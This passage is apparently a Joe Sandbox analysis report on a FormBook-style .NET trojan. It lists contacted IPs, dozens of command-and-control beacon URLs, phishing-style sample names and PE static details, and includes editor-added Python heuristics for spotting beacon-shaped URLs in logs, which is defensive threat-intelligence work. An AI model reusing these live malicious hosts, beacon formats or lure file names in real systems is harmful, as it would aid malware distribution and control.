http://www.jiyu-kobo.co.jp/pt-p | mal.exe, 00000000.00000003.205710785.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
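Most of the URL strings above are noise: truncated font-vendor licence URLs carved from font data in mal.exe and explorer.exe memory, and the parked-page template (display.cfm, px.js, i3.cdn-image.com assets) that the C2 domain served back to control.exe. The entries that matter for pivoting are the ones with the GET-beacon shape seen throughout this report: a single short path segment such as /sm3l/ followed by two query parameters, one carrying a long base64-like blob and the other a short token. The following Python is an added triage helper written for this page by the editor; it is not part of the Joe Sandbox report. The shape heuristic and the length thresholds (40 and 16) are assumptions derived from the URLs on this page rather than a published FormBook specification, and the input list is constructed from strings copied out of the tables above.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: URL strings copied from the tables in this report.
# The parked-domain and font-vendor strings are the noise, the
# /xxxx/?a=...&b=... ones are the beacon candidates.
SAMPLE_URLS = [
    "http://www.mybabytennis.com/sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9+xe6WE7Z8sx0d/816zczOTA6oQi&ixo0sr=dFQtk",
    "www.trendtechpros.com/sm3l/",
    "http://www.mybabytennis.com/px.js?ch=1",
    "http://www.mybabytennis.com/fashion_trends.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxA1",
    "http://www.fontbureau.com/designers/frere-jones.html",
    "www.ameri.loans/dt9v/?WJBxWP=43H5ZqapR2U2c+53UedyyCnf/tAQMSihskCSywJ+5iH1soBQckHw2KLayvSLN2TiqtAl&tFQp=7nutZ",
    "www.ess.xyz/k2m6/?-Z=5jztvT3H&eXrxUtg=48Fqwwc0TpMWpKdyZvZdJZLrLfV5OyuFq874jIM8N+PC/lGntTttinAjIfEcXvLx+ei6yw==",
]

# Heuristic shape (assumption drawn from the URLs on this page, not a
# published FormBook specification): one short path segment with a trailing
# slash, and exactly two query parameters, one a long base64-like blob and
# the other a short token. The thresholds below are also assumptions.
PATH_RE = re.compile(r"^/[a-z0-9]{2,5}/$")
VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")
LONG_MIN, SHORT_MAX = 40, 16


def _with_scheme(url: str) -> str:
    # Strings carved from memory often lack the scheme; urlsplit needs one.
    return url if "://" in url else "http://" + url


def beacon_token(url: str):
    """Return the path token (e.g. 'sm3l') if url has the beacon shape, else None."""
    parts = urlsplit(_with_scheme(url))
    if not PATH_RE.match(parts.path):
        return None
    # Split the query by hand: parse_qsl would turn '+' into a space.
    pairs = [p.split("=", 1) for p in parts.query.split("&") if p]
    if len(pairs) != 2 or any(len(kv) != 2 for kv in pairs):
        return None
    values = [v for _, v in pairs]
    if not all(VALUE_RE.match(v) for v in values):
        return None
    shortest, longest = sorted(len(v) for v in values)
    if shortest > SHORT_MAX or longest < LONG_MIN:
        return None
    return parts.path.strip("/")


def triage(urls):
    """Group beacon-shaped URLs by path token -> sorted list of hosts."""
    grouped = {}
    for url in urls:
        token = beacon_token(url)
        if token is None:
            continue
        host = urlsplit(_with_scheme(url)).hostname
        grouped.setdefault(token, set()).add(host)
    return {token: sorted(hosts) for token, hosts in grouped.items()}


if __name__ == "__main__":
    for token, hosts in sorted(triage(SAMPLE_URLS).items()):
        print(token, hosts)
```

The path token is the useful pivot: hosts that share it (here sm3l on both www.mybabytennis.com and www.trendtechpros.com) belong to the same build, while the query values change on every beacon and are not worth blocking on. Note that the truncated trendtechpros string has no query and is therefore not matched by the helper; it is still listed as malicious in the domain table above.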

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.58.78.16 | www.sarahcarver.com | United States | 16509 | AMAZON-02 (US) | true
209.99.64.55 | www.mybabytennis.com | United States | 40034 | CONFLUENCE-NETWORK-INC (VG) | true

                                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452374
Start date: 22.07.2021
Start time: 08:44:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 59s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: mal.pif (renamed file extension from pif to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@2/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 48.9% (good quality ratio 45.2%)
• Quality average: 75.8%
• Quality standard deviation: 29.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 93.184.220.29, 13.88.21.125, 13.64.90.137, 168.61.161.212, 204.79.197.200, 13.107.21.200, 20.50.102.62, 23.211.4.86, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.211, 80.67.82.235, 20.49.157.6
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net
• Not all processes were analyzed; the report is missing behavior information for them
• Report size getting too big: too many NtAllocateVirtualMemory calls found, so the API log is truncated

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
08:45:17 | API Interceptor | 1x Sleep call for process: mal.exe modified

                                        Joe Sandbox View / Context

                                        IPs

Match | Associated Sample Name / URL | Detection | Context (C2 URL seen in that analysis)

52.58.78.16
PO_2005042020.exe | malicious | www.ameri.loans/dt9v/?WJBxWP=43H5ZqapR2U2c+53UedyyCnf/tAQMSihskCSywJ+5iH1soBQckHw2KLayvSLN2TiqtAl&tFQp=7nutZ
Invoice-Scancopy.docx | malicious | www.ess.xyz/k2m6/?-Z=5jztvT3H&eXrxUtg=48Fqwwc0TpMWpKdyZvZdJZLrLfV5OyuFq874jIM8N+PC/lGntTttinAjIfEcXvLx+ei6yw==
ORDER 200VPS.xlsx | malicious | www.aideliveryrobot.com/p2io/?bH=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&XV88=urL00v88onXp_
LAGIk5ic3R.exe | malicious | www.quickinterchangeableguitars.com/0mq2/?fDHX8=WleDGb2XfF7tUd0&o6ATq=PrDeBWOvFm4C1uiT5+TkruHjtP7PYgIXMNukuC19GOh7I/zDw4hvhKpfG3R3/sFyDX1r
3456_RFQ998778.xlsx | malicious | www.jmbossvodka.com/gno4/?-ZS=YdtY2bnE57KZ5WgSsIzeA3q4iz7LDafvQmGQHnumUAAK16ZgD7FJS8vZbyZDCBBis2h0IQ==&e4=8pNH
Payment_Breakdown_pdf.exe | malicious | www.onlineappointmentsystem.com/ons5/?3f-=nVZuwkx8QtdDg8xrBBXA1XtU0x+dB6tS53/N0IsFnt8ggCwz+Hq54W4pscUCIRDkRkLu&YR-0=y48tk6C
owen.exe | malicious | www.syeioraom.com/a8si/?g2J4yx=-Zg4GfE&S4=2gqxBbxdCHAGZiW08HusmFGOvmsXdbr8Hht+pti8HbRhpYj5OmStbJLwswr0+a+SFvsW
FASMW.EXE | malicious | www.elprado.life/cabq/?iZ=2di86hvH&h6R8xP=7Gl0G44haCAnuWN+7VTog1C/raccTS26kDhalZqSPKgWVaNcTe2u+1G8JtOTpBZpOa50
po_order_item_29062021.exe | malicious | www.monkeyhunter.com/rht3/?y0=Btx4&RV_l=AlhR87CcH+GN+pIusHgdFqhLxnRwmvwNBNp0g7IcE6I1zhj/b7sMRAUJpklc7EpOOxOv
Minutes of Meeting 22062021.exe | malicious | www.eclorui.com/u9pi/?uXR=Z6AdLL&QDHdAp=SWx04GMips4+qG0r1MuFGGrLJlmHj2ZkiaS2KvW5DkDO80Zko+5IrbiudSoPPaV6iNFo
PO NEW ORDER 002001123.exe | malicious | www.sparktattoo.com/0mq2/?c4=IDKtp8tH&4h_hvt=idlga/P0FfYCKTBivrcOkdytvtILpJxZJlPumr4sHFEsS0Scr/u/HZg+xbKITV9CPDtJ
Swift advice Receipt.exe | malicious | www.a-v-r.com/n86i/?u2MpU0a=WwYEqAm2RTF4TFg6Jp6u7CuwpfJ8oxKF4GY56fD50OPmZs5P3Qyp6f8YN06/kKU0Yzpf&1bWh=5jQLgpC8L23
eHTLcWfhgv.exe | malicious | www.newmopeds.com/p2io/?0R-DOx9=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf0TAQaa2gAlI7xx6A==&y6A=xFQDIPbxpJaT
Import Custom Duty invoice & its clearance documents.exe | malicious | www.cool-sil.com/iic6/?r4pT=y/kfwyw/RZwsvgZE5IY9NPvw7FTiW/OGKxX5BqNDRQj08yuVS/JTuewaC78miPUy3gtG&lR-x=DPUt3nr8mrdpDjG
TT-Bank-Slip.exe | malicious | www.vaginalmedicine.com/m3rc/?p2=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfc9FuV2tCtq&6lM=SJEx9rv
Enquiry_014821-23.exe | malicious | www.johnmabry.com/n86i/?zBtlQRl=Y8G/RqOPd6iMXSNDp68Mpx61scf3/6KZP+emN2XlS3BALTl1RcjIqekJnqea+Qg2WqdJDqumrQ==&-ZW=NBsHKPh0D0YP7FE
SKM_4050210326102400 jpg.exe | malicious | www.justswap.exchange/nvj9/?4h=Cjox&2d=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN6sncqWGGRf/
kkaH2ZEdQ1.exe | malicious | www.cacacece.com/ybn/?oRm8=s8YlDbK80xIp&-ZdTr=nRee68VRz3NrMycEhRd2xL3VYKU8ZPsfy7+/YZQiZ17kpYPgKQlxEGBpOHvvMJMEZLP0
RE Purchase Order.exe | malicious | www.dahumblehustla.com/u6e4/?WBZD=FcjbzBS6ioR5wNj31i3bICntrHdtVtLDdz4suCSLzvDCKJtKmLQo4u4Bo+cvT6cF9+Bm&TR-=0b08lfbHdjGhtdZp
J1Dud83xTM.exe | malicious | www.aideliveryrobot.com/p2io/?A84HSd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJB7ONmCMyK8X&m0DDI=7n0XLDsHCfKHsv

209.99.64.55
Revised PI.exe | malicious | www.mybudget.zone/fmjo/?n48xDrgx=GpIABCQxiObyNblEswvGYvv/sDGQz43HPG7Pv915aVAhMK8loGrecjPaoRAxnJu2VxWp&zJE47=3fLD_NrXMhkl
SWIFT jpg.exe | malicious | www.lacovidexpress.com/nvj9/?w2=XDRMxc7UIkhWVbW0mmSUyFdnrACDr9+mGsQLTBlwWeXbqmaIwckJXDH9z4EJWnqZ/ad9&BX=7nEt_PI
IRMEFUV8EF.exe | malicious | www.caminozine.com/et9g/?Rt=5jRtk6QPUNeLf&Z6AdF8=8+BMXVNMMsVrYlzgNQH1TDlCKgoMzV1Fz/FzyLZoUWrMnjl9CKWvex2nc0FVl7SHAfsu
0434 pdf.exe | malicious | www.bitinnovo.com/gmn/?RvE=JlMxetF0hVF&E8t=xnIRAt/7CYbRUv5b4d7bwBgrW1e4xwfn4tYmIUYBbqi2fkgzrbUtBVRH4ZzrcUfd4Rx2
                                        PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                        • www.northatlanticspacearmy.com/zgg6/?i4=Ppcd&N2=nFSvlJEP8Jh213m4NFtxF31kiWpk7m93KklWlj2WLsuCxYct2f6aaHVpJCu4KAYKwmd6
                                        Quotation.exeGet hashmaliciousBrowse
                                        • www.pinewayorganics.com/uidr/?a48=tXExBtAPgPXL&FPWh=D6O5F+Y0fPrtOcUmz12XulGlM3izb9iCvGqr3cKi7KXPDgYxiikAkCk5lq2cxGLYtmRIpdKF7A==
                                        Quotation.exeGet hashmaliciousBrowse
                                        • www.pinewayorganics.com/uidr/?b6=D6O5F+Y0fPrtOcUmz12XulGlM3izb9iCvGqr3cKi7KXPDgYxiikAkCk5lq6ciWHb02Re&DbG=_DKdFj
                                        SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                        • www.washfoldndelivery.com/css/?X2MhMfE0=4rFc9E/gfr4f5wcqGF2L13wp1H+hdvw3tQh+7wR+s/6Cxbp4UJTH/oYeEBcG3YuqTMyZ&8p=EZTP7L
                                        SWIFT USD 354,883.00.exeGet hashmaliciousBrowse
                                        • www.shuttergame.com/6bu2/?YL0=c+4vkwAPBI+DImtGL27UfnShvOvamLH70aNBjGiX5UbV4Kc9SaGe1WI6mHDGYrUBzGrk&DjU4Hl=gbG8jNk0zBv
                                        SMA121920.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?_6j0yv=ZJB82RWHd85&QFNH9f=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APP3xBQCKyC9c
                                        SOA121520.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?9rspyh=ffh4_hPhQ&xRWxBfL=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APMXLRBiyolcb
                                        jrzlwOa0UC.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?Dxlpd=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APP7xSAOJrS9K82FydA==&lhuh=TxlhfFN
                                        SOA109216.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?MJBD=FdFp3fCHnzolbffP&qr8=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9
                                        PI210941.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?o2J=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APMXLRBiyolcb&4h0=vZR8DbS8Z4yXah
                                        PI109372.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?8pdXBn8P=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9&EZUpc0=LDKXxHJhtzTle
                                        PI41006.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?bl=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5IwhzDU79r9&MJBHa=GdqXjbDP-RddJJ
                                        SKM109482.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?ohoDP=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf6oguSTslYC6&1bj=3fb4M84hjHXXBp
                                        ASQ2109942.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?Cj=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9&D8P=Br-0dH
                                        WQA101320.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?6lbLpdZ0=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APP7INxuKlEhN82F1Ow==&3f=ZlO83hE8VbM
                                        0RNzedtLDba4L25.exeGet hashmaliciousBrowse
                                        • www.diamondridgestablesllc.net/aq3x/
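The context URLs above share one URI shape: a short lowercase directory of three or four characters, then a query with one short key/value pair and one pair whose value is a long base64-like blob, in either order. The following is an added worked example, not code from the Joe Sandbox report or from the FormBook operators: a triage heuristic that encodes that shape and runs it over a handful of the URLs listed above (copied from the table) plus a few constructed benign look-alikes. The length cut-offs (directory 3 to 4 characters, long value at least 40 characters, short value at most 24) are assumptions tuned to the listed URLs, not a published signature.

```python
# Added example (not from the Joe Sandbox report): a heuristic for the URI shape
# shared by the FormBook C2 URLs listed in the context table.
import re
from urllib.parse import urlsplit

# Shape seen in every context URL with a query: "/<3-4 lowercase alnum>/?" followed by one
# short key=value pair and one pair whose value is a long base64-like blob, in either order.
# The cut-offs below are assumptions tuned to the listed URLs, not a published signature.
DIR_RE = re.compile(r"^/[a-z0-9]{3,4}/$")
KEY_RE = re.compile(r"^[A-Za-z0-9_-]{1,10}$")
LONG_VALUE_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
SHORT_VALUE_RE = re.compile(r"^[A-Za-z0-9_-]{1,24}$")


def looks_like_formbook_c2(url: str) -> bool:
    """Return True when a URL has the FormBook-style beacon shape described above."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    if not DIR_RE.match(parts.path) or not parts.query:
        return False
    # Split by hand: urllib.parse.parse_qs would turn '+' into spaces and destroy the base64 shape.
    pairs = [p.partition("=") for p in parts.query.split("&")]
    if not 1 <= len(pairs) <= 2:
        return False
    long_values = short_values = 0
    for key, _, value in pairs:
        if not KEY_RE.match(key):
            return False
        if LONG_VALUE_RE.match(value):
            long_values += 1
        elif SHORT_VALUE_RE.match(value):
            short_values += 1
        else:
            return False
    # Exactly one long blob; every other pair is a short token.
    return long_values == 1 and short_values == len(pairs) - 1


def scan(urls):
    """Return the URLs that match, preserving input order (e.g. from a proxy log)."""
    return [u for u in urls if looks_like_formbook_c2(u)]


# Copied from the context table above (C2 URLs seen with related FormBook samples).
CONTEXT_URLS = [
    "www.elprado.life/cabq/?iZ=2di86hvH&h6R8xP=7Gl0G44haCAnuWN+7VTog1C/raccTS26kDhalZqSPKgWVaNcTe2u+1G8JtOTpBZpOa50",
    "www.a-v-r.com/n86i/?u2MpU0a=WwYEqAm2RTF4TFg6Jp6u7CuwpfJ8oxKF4GY56fD50OPmZs5P3Qyp6f8YN06/kKU0Yzpf&1bWh=5jQLgpC8L23",
    "www.newmopeds.com/p2io/?0R-DOx9=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf0TAQaa2gAlI7xx6A==&y6A=xFQDIPbxpJaT",
    "www.washfoldndelivery.com/css/?X2MhMfE0=4rFc9E/gfr4f5wcqGF2L13wp1H+hdvw3tQh+7wR+s/6Cxbp4UJTH/oYeEBcG3YuqTMyZ&8p=EZTP7L",
    "www.consultation-hippopotame.com/xnc/?Cj=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9&D8P=Br-0dH",
    "www.diamondridgestablesllc.net/aq3x/",  # listed without a beacon query: the directory alone is not enough
]
# Constructed benign look-alikes (not from the report) showing what the heuristic ignores.
BENIGN_URLS = [
    "www.example.com/css/?v=1.2.3",
    "www.example.com/news/?id=42&lang=en",
    "www.example.com/img/?t=a+b",
]

if __name__ == "__main__":
    for url in CONTEXT_URLS + BENIGN_URLS:
        print("C2-like " if looks_like_formbook_c2(url) else "ignored ", url)
```

The check is a triage aid for proxy or DNS-plus-URL logs, not a detection on its own: a site with a short directory and a single base64-encoded tracking parameter will also match, so hits should be joined with the host reputation and the process that made the request before acting on them.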

                                        Domains

                                        No context

                                        ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-02 (US) | vjsBNwolo9.js | malicious | 76.223.26.96
| r3xwkKS58W.exe | malicious | 52.217.135.113
| A7X93JRxhp | malicious | 54.151.74.14
| 1Ds9g7CEsp | malicious | 13.208.189.104
| XuQRPW44hi | malicious | 54.228.23.118
| Taf5zLti30 | malicious | 44.231.84.110
| 5qpsqg7U0G | malicious | 34.219.219.82
| LyxN1ckWTW | malicious | 18.139.244.68
| ZlvFNj.dll | malicious | 3.16.22.120
| U4r9W64doy | malicious | 13.245.89.196
| C4PozjQdGE | malicious | 18.135.214.121
| kb5IbEJU8c | malicious | 18.227.43.189
| MD5OxTSc6i | malicious | 18.149.163.217
| P58w6OezJY.exe | malicious | 52.217.198.209
| c51w5YSYdO | malicious | 108.146.155.164
| meu.agendamento.msi | malicious | 52.95.165.102
| rxfttQnoO5 | malicious | 18.237.164.103
| iUmNR6tkEd | malicious | 13.208.205.131
| LDWhPg4vRM | malicious | 176.34.44.130
| boysLove.dll | malicious | 52.8.202.218
CONFLUENCE-NETWORK-INC (VG) | vjsBNwolo9.js | malicious | 204.11.56.48
| Inv_7623980.exe | malicious | 204.11.56.48
| Y-20211907-00927735_pdf.exe | malicious | 204.11.56.48
| OpqhGKdDwO.exe | malicious | 209.99.40.222
| jnl3kWNWWS.exe | malicious | 208.91.197.27
| request for quote.exe | malicious | 208.91.197.91
| 2GuNlCn0X6.exe | malicious | 208.91.197.27
| G1638.exe | malicious | 204.11.56.48
| VLC_32.exe | malicious | 208.91.196.145
| seBe6bgLTw.exe | malicious | 209.99.40.222
| doc.exe | malicious | 208.91.197.91
| DOC00368.exe | malicious | 208.91.197.91
| PO=List Orders 2921TYP001 - Xls.exe | malicious | 208.91.197.91
| SEOCHANG INDUSTRY Co., Ltd..exe | malicious | 209.99.40.222
| Order=bcm_28062021.exe | malicious | 208.91.197.27
| SEOCHANG INDUSTRY Co., Ltd..exe | malicious | 209.99.40.222
| Invoice confirmation & NEW PO for 2 sets of items.exe | malicious | 208.91.197.39
| h3Ls1L8ZOL | malicious | 208.91.197.238
| 0rder-bcm_23062021.exe | malicious | 208.91.197.27
| New Order.exe | malicious | 208.91.197.91

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mal.exe.log
                                        Process:C:\Users\user\Desktop\mal.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.8474389500273185
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:mal.exe
                                        File size:605696
                                        MD5:b9bca038d7532ec8a1a9ba0e867061bc
                                        SHA1:6596ac1216bf03d88482415755c499ed6388cab4
                                        SHA256:24d91f6c3dcad36d65e45821d520aaabc2f4a87bb1ab512d6807377010d5680e
                                        SHA512:861bfb748cd3060698d23e04e0b58d2e2eb12dedfbfdeeece6a5643bdeab9472bbe3f73d144e95fd78e8ee862ae3fde9385b11b2f35b0ea0c974326d70846e6d
                                        SSDEEP:12288:NRzBs9vQVJ16RzfqfJ3druK3MfxoH6prHTdtqMVkhV8Rb:NQ9vQr147qfJ4nxxHTni
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B.`..............P..4...........R... ...`....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4952ee
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60F242BD [Sat Jul 17 02:38:53 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated to the end of the preview window)

This is the standard native stub of a managed executable. The jmp takes its target from 0x00402000, which is the start of the 8-byte IAT listed under Data Directories (RVA 0x2000 at image base 0x400000), and the only import is mscoree.dll!_CorExeMain, so the native entry point does nothing but hand control to the CLR. The bytes after the 6-byte jmp are zero padding, which the disassembler renders as the repeated add byte ptr [eax], al (opcode 00 00). The program logic lives in the managed (IL) code, which this native disassembly does not show.

                                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9529c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x96000 | 0x5f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x932f4 | 0x93400 | False | 0.890101071732 | data | 7.85599061274 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x96000 | 0x5f8 | 0x600 | False | 0.438151041667 | data | 4.22887304972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x98000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

Name | RVA | Size | Type | Language | Country
